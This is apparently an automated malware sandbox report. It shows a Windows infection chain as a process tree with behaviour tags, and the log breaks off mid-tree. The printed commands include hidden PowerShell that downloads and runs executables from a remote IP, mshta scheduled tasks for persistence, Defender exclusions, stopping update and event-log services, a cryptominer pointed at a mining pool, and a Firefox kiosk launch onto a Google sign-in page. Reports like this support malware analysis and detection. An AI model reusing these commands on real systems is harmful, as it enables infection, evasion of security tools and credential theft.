PID 1280 wrote to memory of 2616	1280	b90944a141.exe	30
PID 1280 wrote to memory of 2616	1280	b90944a141.exe	30
PID 1280 wrote to memory of 2616	1280	b90944a141.exe	30
PID 1280 wrote to memory of 2616	1280	b90944a141.exe	30
PID 1280 wrote to memory of 2364	1280	b90944a141.exe	31
PID 1280 wrote to memory of 2364	1280	b90944a141.exe	31
PID 1280 wrote to memory of 2364	1280	b90944a141.exe	31
PID 1280 wrote to memory of 2364	1280	b90944a141.exe	31
PID 2616 wrote to memory of 2532	2616	cmd.exe	33
PID 2616 wrote to memory of 2532	2616	cmd.exe	33
PID 2616 wrote to memory of 2532	2616	cmd.exe	33
PID 2616 wrote to memory of 2532	2616	cmd.exe	33
PID 2364 wrote to memory of 3028	2364	mshta.exe	34
PID 2364 wrote to memory of 3028	2364	mshta.exe	34
PID 2364 wrote to memory of 3028	2364	mshta.exe	34
PID 2364 wrote to memory of 3028	2364	mshta.exe	34
PID 3028 wrote to memory of 2804	3028	powershell.exe	37
PID 3028 wrote to memory of 2804	3028	powershell.exe	37
PID 3028 wrote to memory of 2804	3028	powershell.exe	37
PID 3028 wrote to memory of 2804	3028	powershell.exe	37
PID 2804 wrote to memory of 684	2804	Temp0KJJ1W58HIH64LKIUHDEUEFTC1P5CQDS.EXE	38
PID 2804 wrote to memory of 684	2804	Temp0KJJ1W58HIH64LKIUHDEUEFTC1P5CQDS.EXE	38
PID 2804 wrote to memory of 684	2804	Temp0KJJ1W58HIH64LKIUHDEUEFTC1P5CQDS.EXE	38
PID 2804 wrote to memory of 684	2804	Temp0KJJ1W58HIH64LKIUHDEUEFTC1P5CQDS.EXE	38
PID 684 wrote to memory of 2520	684	rapes.exe	40
PID 684 wrote to memory of 2520	684	rapes.exe	40
PID 684 wrote to memory of 2520	684	rapes.exe	40
PID 684 wrote to memory of 2520	684	rapes.exe	40
PID 684 wrote to memory of 2668	684	rapes.exe	41
PID 684 wrote to memory of 2668	684	rapes.exe	41
PID 684 wrote to memory of 2668	684	rapes.exe	41
PID 684 wrote to memory of 2668	684	rapes.exe	41
PID 2668 wrote to memory of 1368	2668	ZqkKpwG.exe	42
PID 2668 wrote to memory of 1368	2668	ZqkKpwG.exe	42
PID 2668 wrote to memory of 1368	2668	ZqkKpwG.exe	42
PID 2668 wrote to memory of 1368	2668	ZqkKpwG.exe	42
PID 2668 wrote to memory of 1048	2668	ZqkKpwG.exe	43
PID 2668 wrote to memory of 1048	2668	ZqkKpwG.exe	43
PID 2668 wrote to memory of 1048	2668	ZqkKpwG.exe	43
PID 2668 wrote to memory of 1048	2668	ZqkKpwG.exe	43
PID 2668 wrote to memory of 1048	2668	ZqkKpwG.exe	43
PID 2668 wrote to memory of 1048	2668	ZqkKpwG.exe	43
PID 2668 wrote to memory of 1048	2668	ZqkKpwG.exe	43
PID 2668 wrote to memory of 1048	2668	ZqkKpwG.exe	43
PID 2668 wrote to memory of 1048	2668	ZqkKpwG.exe	43
PID 2668 wrote to memory of 1048	2668	ZqkKpwG.exe	43
PID 684 wrote to memory of 932	684	rapes.exe	44
PID 684 wrote to memory of 932	684	rapes.exe	44
PID 684 wrote to memory of 932	684	rapes.exe	44
PID 684 wrote to memory of 932	684	rapes.exe	44
PID 932 wrote to memory of 1248	932	9JFiKVm.exe	46
PID 932 wrote to memory of 1248	932	9JFiKVm.exe	46
PID 932 wrote to memory of 1248	932	9JFiKVm.exe	46
PID 684 wrote to memory of 2616	684	rapes.exe	47
PID 684 wrote to memory of 2616	684	rapes.exe	47
PID 684 wrote to memory of 2616	684	rapes.exe	47
PID 684 wrote to memory of 2616	684	rapes.exe	47
PID 2616 wrote to memory of 584	2616	packed.exe	48
PID 2616 wrote to memory of 584	2616	packed.exe	48
PID 2616 wrote to memory of 584	2616	packed.exe	48
PID 2616 wrote to memory of 2996	2616	packed.exe	50
PID 2616 wrote to memory of 2996	2616	packed.exe	50
PID 2616 wrote to memory of 2996	2616	packed.exe	50
PID 2616 wrote to memory of 2856	2616	packed.exe	52

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\b90944a141.exe
"C:\Users\Admin\AppData\Local\Temp\b90944a141.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1280
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn DKWUPma0jYb /tr "mshta C:\Users\Admin\AppData\Local\Temp\bLpknnnYo.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2616
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn DKWUPma0jYb /tr "mshta C:\Users\Admin\AppData\Local\Temp\bLpknnnYo.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2532
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\bLpknnnYo.hta
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:2364
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'0KJJ1W58HIH64LKIUHDEUEFTC1P5CQDS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3028
  - - C:\Users\Admin\AppData\Local\Temp0KJJ1W58HIH64LKIUHDEUEFTC1P5CQDS.EXE
      "C:\Users\Admin\AppData\Local\Temp0KJJ1W58HIH64LKIUHDEUEFTC1P5CQDS.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:2804
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:684
      - C:\Users\Admin\AppData\Local\Temp\10171300101\s7MG2VL.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10171300101\s7MG2VL.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2520
      - C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2668
        
        C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        7⤵
        Executes dropped EXE
        
        PID:1368
        
        C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10181980101\ZqkKpwG.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies system certificate store
        
        PID:1048
      - C:\Users\Admin\AppData\Local\Temp\10204230101\9JFiKVm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10204230101\9JFiKVm.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:932
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 932 -s 36
        7⤵
        Loads dropped DLL
        
        PID:1248
      - C:\Users\Admin\AppData\Local\Temp\10215600101\packed.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10215600101\packed.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Enumerates system info in registry
        Suspicious use of WriteProcessMemory
        
        PID:2616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:584
        
        C:\Windows\system32\schtasks.exe
        
        schtasks.exe /create /tn "SystemHelperTask" /tr "C:\Users\Admin\AppData\Local\Temp\10215600101\packed.exe" /sc onlogon /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2996
        
        C:\Program Files\RuntimeApp\0000028173.exe
        
        "C:\Program Files\RuntimeApp\0000028173.exe"
        7⤵
        Executes dropped EXE
        
        PID:2856
      - C:\Users\Admin\AppData\Local\Temp\10217320101\Esu6YYl.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10217320101\Esu6YYl.exe"
        6⤵
        Executes dropped EXE
        
        PID:576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -inputformat none -outputformat none -NonInteractive -Command Add -MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Updater"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2804
        
        C:\Windows\system32\schtasks.exe
        
        "schtasks" /Create /SC ONLOGON /RL HIGHEST /TN "Updater" /TR "C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe" /F
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2168
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /C ping 127.0.0.1 -n 3 > nul && start "" "C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe"
        7⤵
        Loads dropped DLL
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1044
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 3
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2332
        
        C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe
        
        "C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2288
        
        C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe
        
        C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe curl.dll
        9⤵
        Executes dropped EXE
        
        PID:2696
        
        C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe
        
        C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe --url pool.hashvault.pro:443 --user 4AzoDsqqcueLbpDUZn5LUYA6JeJ61CWW51bdL9UsCNLKc4wq8BZxBuTPZPQDcMfxZPRRu643zHB5fXjgc9sGwELjQt7Tkxs --pass x --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:312
      - C:\Users\Admin\AppData\Local\Temp\10219920101\O9s3coZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10219920101\O9s3coZ.exe"
        6⤵
        Executes dropped EXE
        
        PID:992
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 992 -s 36
        7⤵
        Loads dropped DLL
        
        PID:1688
      - C:\Users\Admin\AppData\Local\Temp\10222660101\j21Hq7C.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10222660101\j21Hq7C.exe"
        6⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Modifies Windows Defender Real-time Protection settings
        Downloads MZ/PE file
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\mine.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mine.exe"
        7⤵
        
        PID:2912
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2580
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:1688
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        9⤵
        
        PID:1352
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        8⤵
        Launches sc.exe
        
        PID:292
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        8⤵
        Launches sc.exe
        
        PID:916
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        8⤵
        Launches sc.exe
        
        PID:2408
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        8⤵
        Launches sc.exe
        
        PID:1608
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        8⤵
        Launches sc.exe
        
        PID:956
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        8⤵
        Power Settings
        
        PID:2352
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        8⤵
        Power Settings
        
        PID:2788
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        8⤵
        Power Settings
        
        PID:2628
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        8⤵
        Power Settings
        
        PID:1644
        
        C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        8⤵
        
        PID:484
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "WindowsAutHost"
        8⤵
        Launches sc.exe
        
        PID:868
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "WindowsAutHost" binpath= "C:\ProgramData\WindowsServices\WindowsAutHost" start= "auto"
        8⤵
        Launches sc.exe
        
        PID:2264
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        8⤵
        Launches sc.exe
        
        PID:540
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "WindowsAutHost"
        8⤵
        Launches sc.exe
        
        PID:1592
        
        C:\Users\Admin\AppData\Local\Temp\debuger.exe
        
        "C:\Users\Admin\AppData\Local\Temp\debuger.exe"
        7⤵
        
        PID:2752
      - C:\Users\Admin\AppData\Local\Temp\10222760101\0e0ddeb673.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10222760101\0e0ddeb673.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2532
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn YEK5Gma86tt /tr "mshta C:\Users\Admin\AppData\Local\Temp\3m2UnshCr.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2576
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn YEK5Gma86tt /tr "mshta C:\Users\Admin\AppData\Local\Temp\3m2UnshCr.hta" /sc minute /mo 25 /ru "Admin" /f
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3032
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\3m2UnshCr.hta
        7⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'KI3ZPNYIUECFKAEBM1PM3BQIQIJB79PW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\TempKI3ZPNYIUECFKAEBM1PM3BQIQIJB79PW.EXE
        
        "C:\Users\Admin\AppData\Local\TempKI3ZPNYIUECFKAEBM1PM3BQIQIJB79PW.EXE"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2700
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\10222770121\am_no.cmd" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2352
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1044
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1736
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2032
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1872
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2020
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "EnyFlmaSmEO" /tr "mshta \"C:\Temp\dK7BgfNin.hta\"" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2484
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\dK7BgfNin.hta"
        7⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        9⤵
        
        PID:936
      - C:\Users\Admin\AppData\Local\Temp\10222880101\dBKUxeI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10222880101\dBKUxeI.exe"
        6⤵
        Executes dropped EXE
        
        PID:1752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Expand-Archive -Force \"C:\Users\Admin\AppData\Local\Temp\updater101\backup.zip\" \"C:\Users\Admin\AppData\Local\Temp\updater101\backup\""
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Expand-Archive -Force \"C:\Users\Admin\AppData\Local\Temp\updater101\wwfcx.zip\" \"C:\Users\Admin\AppData\Local\Temp\updater101\wwfcx\""
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "Expand-Archive -Force \"C:\Users\Admin\AppData\Local\Temp\updater101\h2wb5_002.zip\" \"C:\Users\Admin\AppData\Local\Temp\updater101\h2wb5_002\""
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2764
      - C:\Users\Admin\AppData\Local\Temp\10223440101\5e3a62810f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10223440101\5e3a62810f.exe"
        6⤵
        
        PID:380
      - C:\Users\Admin\AppData\Local\Temp\10223450101\5add714c00.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10223450101\5add714c00.exe"
        6⤵
        
        PID:2320
      - C:\Users\Admin\AppData\Local\Temp\10223460101\53688b05d9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10223460101\53688b05d9.exe"
        6⤵
        
        PID:876
      - C:\Users\Admin\AppData\Local\Temp\10223470101\9da0fb06d8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10223470101\9da0fb06d8.exe"
        6⤵
        
        PID:1200
      - C:\Users\Admin\AppData\Local\Temp\10223480101\ed48481cca.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10223480101\ed48481cca.exe"
        6⤵
        
        PID:976
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        Kills process with taskkill
        
        PID:2032
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        Kills process with taskkill
        
        PID:1592
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        Kills process with taskkill
        
        PID:2244
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        Kills process with taskkill
        
        PID:596
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        Kills process with taskkill
        
        PID:3032
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:2752
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        
        PID:992
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="992.0.1378449434\297944108" -parentBuildID 20221007134813 -prefsHandle 1232 -prefMapHandle 1224 -prefsLen 21005 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0aea7036-a173-46f2-8664-9dad69ad2b92} 992 "\\.\pipe\gecko-crash-server-pipe.992" 1316 109d8c58 gpu
        9⤵
        
        PID:2064
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="992.1.1132840331\269349398" -parentBuildID 20221007134813 -prefsHandle 1504 -prefMapHandle 1500 -prefsLen 21866 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {820a2831-b93a-487e-82ad-c98741f01812} 992 "\\.\pipe\gecko-crash-server-pipe.992" 1516 f7ec458 socket
        9⤵
        
        PID:2348
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="992.2.909511146\706613810" -childID 1 -isForBrowser -prefsHandle 1852 -prefMapHandle 1880 -prefsLen 21904 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6fa18311-26ba-4f38-8dd4-c71b294cbc2b} 992 "\\.\pipe\gecko-crash-server-pipe.992" 2164 196d3b58 tab
        9⤵
        
        PID:936
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="992.3.844329987\81300342" -childID 2 -isForBrowser -prefsHandle 2664 -prefMapHandle 2660 -prefsLen 26374 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e4747cf-fccf-4e6a-890a-f953eb8aa44c} 992 "\\.\pipe\gecko-crash-server-pipe.992" 2676 104f9258 tab
        9⤵
        
        PID:1480
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="992.4.1515186008\2124297986" -childID 3 -isForBrowser -prefsHandle 3960 -prefMapHandle 3956 -prefsLen 26514 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {69e48774-f165-458f-a741-48b6b4b100db} 992 "\\.\pipe\gecko-crash-server-pipe.992" 3972 1072e558 tab
        9⤵
        
        PID:2908
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="992.5.1844251236\1662604098" -childID 4 -isForBrowser -prefsHandle 3920 -prefMapHandle 3932 -prefsLen 26514 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eff37acf-4242-44aa-bab4-015cc099e6e9} 992 "\\.\pipe\gecko-crash-server-pipe.992" 3988 1072be58 tab
        9⤵
        
        PID:2016
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="992.6.1127723530\1086933592" -childID 5 -isForBrowser -prefsHandle 4084 -prefMapHandle 4076 -prefsLen 26514 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {afde2426-fd06-4d71-90b4-3ca6ba98511a} 992 "\\.\pipe\gecko-crash-server-pipe.992" 4152 1072d058 tab
        9⤵
        
        PID:1920
      - C:\Users\Admin\AppData\Local\Temp\10223490101\3ef7a88cb8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10223490101\3ef7a88cb8.exe"
        6⤵
        
        PID:2844
      - C:\Users\Admin\AppData\Local\Temp\10223500101\528f7b6e30.exe
        
